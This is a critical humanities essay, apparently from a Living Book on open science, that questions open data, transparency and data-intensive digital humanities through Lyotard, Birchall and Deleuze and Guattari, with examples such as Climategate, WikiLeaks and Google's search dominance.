&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. (Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might agree with them nonetheless when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' 